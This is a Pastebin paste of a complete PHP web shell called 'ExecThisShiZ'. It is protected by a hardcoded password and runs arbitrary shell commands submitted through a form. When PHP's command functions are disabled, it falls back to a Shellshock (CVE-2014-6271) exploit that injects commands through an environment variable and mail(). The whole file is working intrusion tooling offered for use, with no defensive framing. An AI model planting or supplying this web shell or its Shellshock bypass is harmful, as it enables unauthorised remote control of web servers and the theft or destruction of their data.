Advertisement
iAnonGuy

~ ExeCThisShiZ ~

Aug 28th, 2015
167
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 4.52 KB | None | 0 0
  1. <?php
  2. error_reporting(0);
  3. session_start();
  4. set_time_limit(0);
  5. $pass = $_POST['pass'];
  6. $password = "an0nguy"; # Password
  7. $action = $_POST['action'];
  8. $host = $_SERVER["HTTP_HOST"];
  9. $b0x = gethostbyname($_SERVER["HTTP_HOST"]);
  10. $ip = $_SERVER["REMOTE_ADDR"];
  11. $login = true;
  12. if($pass == $password)
  13. {$_SESSION['AG'] = "$pass";}
  14. if($login == true)
  15. {if(!isset($_SESSION['AG']) or $_SESSION['AG'] != $password)
  16. # Login Page
  17. {die("<head>
  18. <title>~ ExecThisShiZ ~</title>
  19. <style>
  20. input[type='submit']:hover {background-color:#00ff00;color:#000;}
  21. input {margin:0;color:#00ff00;background-color:#000000;border:1px solid #00ff00;}
  22. #border {border-radius: 25px;border: 2px solid #8AC007;width: 300px;height: 80px;}
  23. </style>
  24. </head>
  25. <body bgcolor=black>
  26. <center>
  27. <form method=post>
  28. <font size=7 face=Monospace color=white>~ <font color=red>Exec<font color=white>ThisShiZ <font color=white>~<br><br>
  29. <font color=lime size=4>Pass <font color=white>~ <input type=password name=pass size=30><font color=white> ~ <input type=submit value='>>'><br><br>
  30. </form><br><div id=border align=center>
  31. <font size=4 face=Monospace color=lime><b>Host <font color=white>~ </b>".$host."<br>
  32. <font color=lime><b>b0x's IP <font color=white>~ </b>".$b0x."<br>
  33. <font color=lime><b>Your IP <font color=white>~ </b>".$ip."
  34. </div></center>
  35. </body>");}}
  36. ?>
  37. <!DOCTYPE html>
  38. <html>
  39. <head>
  40.     <title>~ ExecThisShiZ ~</title>
  41.     <style type="text/css">
  42.     body  {background-color: black;}
  43.     pre   {color: lime;}
  44.     #cat  {color: white;}
  45.     input {margin:0;color:#00ff00;background-color:#000000;border:1px solid #00ff00;}
  46.     input [type='submit']:hover {background-color:#00ff00;color:#000;}
  47.     </style>
  48. </head>
  49. <body>
  50. <center>
  51. <pre>
  52.   ______            _______ _     _      _____ _     _ ______
  53.  |  ____|          |__   __| |   (_)    / ____| |   (_)___  /
  54.  | |__  __  _____  ___| |  | |__  _ ___| (___ | |__  _   / /
  55.  |  __| \ \/ / _ \/ __| |  | '_ \| / __|\___ \| '_ \| | / /  
  56.  | |____ >  <  __/ (__| |  | | | | \__ \____) | | | | |/ /__
  57.  |______/_/\_\___|\___|_|  |_| |_|_|___/_____/|_| |_|_/_____|
  58. <font color="white">       ~ Coded By <font color="lime">AnonGuy                     <font color="red">an0nguy<font color="yellow">@<font color="white">protonmail.ch    
  59. </font></font></font></font></font></pre>
  60. <form method="POST">
  61.     <input type="text" name="exec" placeholder="uname -a" />
  62.     <font face="Monospace" color="yellow"> ~ </font>
  63.     <input type="submit" name="submit" value=">>" />
  64. </form>
  65. <?php
  66. error_reporting(0);
  67. $exec   = $_POST["exec"];
  68. $submit = $_POST["submit"];
  69. function ExecThisShiZ($input)
  70. {
  71.     $result = "";
  72.     if (function_exists('exec')) {
  73.         @exec($input, $result);
  74.         $result = join("\n", $result);
  75.     } elseif (function_exists('passthru')) {
  76.         ob_start();
  77.         passthru($input);
  78.         $result = ob_get_clean();
  79.     } elseif (function_exists('system')) {
  80.         ob_start();
  81.         system($input);
  82.         $result = ob_get_clean();
  83.     } elseif (function_exists('shell_exec')) {
  84.         $result = shell_exec($input);
  85.     } elseif (is_resource($f = popen($input, "r"))) {
  86.         $result = "";
  87.         while (!@feof($f))
  88.             $result .= fread($f, 1024);
  89.         pclose($f);
  90.     } else {
  91.         $result = sh0ck($input);
  92.     }
  93.     return $result;
  94. }
  95. function sh0ck($cmd) # Execute a command via CVE-2014-6271 @ mail.c:283 ~ https://www.exploit-db.com/exploits/35146/
  96. {
  97.     if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
  98.         $tmp = tempnam(".", "data");
  99.         putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
  100.         mail("a@127.0.0.1", "", "", "", "-bv");
  101.     } else
  102.         return "";
  103.     $output = @file_get_contents($tmp);
  104.     @unlink($tmp);
  105.     if ($output != "")
  106.         return $output;
  107.     else
  108.         return "";
  109. }
  110. if (isset($submit, $exec) && $exec === "LogMeOut") {
  111.     echo '<script type="text/javascript">document.body.innerHTML = "<center><img src=http://media.giphy.com/media/pSK5T3pZK13ZS/giphy.gif><br><font face=Monospace size=5 color=white>:)</font></center>";</script>';
  112. unset($_SESSION['AG']);
  113. }
  114. elseif (isset($submit, $exec) && preg_match('/cat/', $exec)) {
  115.     echo '<pre id="cat">' . ExecThisShiZ($exec) . '</pre>';
  116. } elseif (isset($submit, $exec)) {
  117.     echo '<br><font color="white" face="Monospace">' . ExecThisShiZ($exec) . '</font>';
  118. } elseif (isset($submit) && !isset($exec)) {
  119.     echo '<br><font color="white" face="Monospace">Err, You kiddin me? -___- You wanna play the guessin\' game? Fuck off.</font>';
  120. }
  121. ?>
  122. </center>
  123. </body>
  124. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement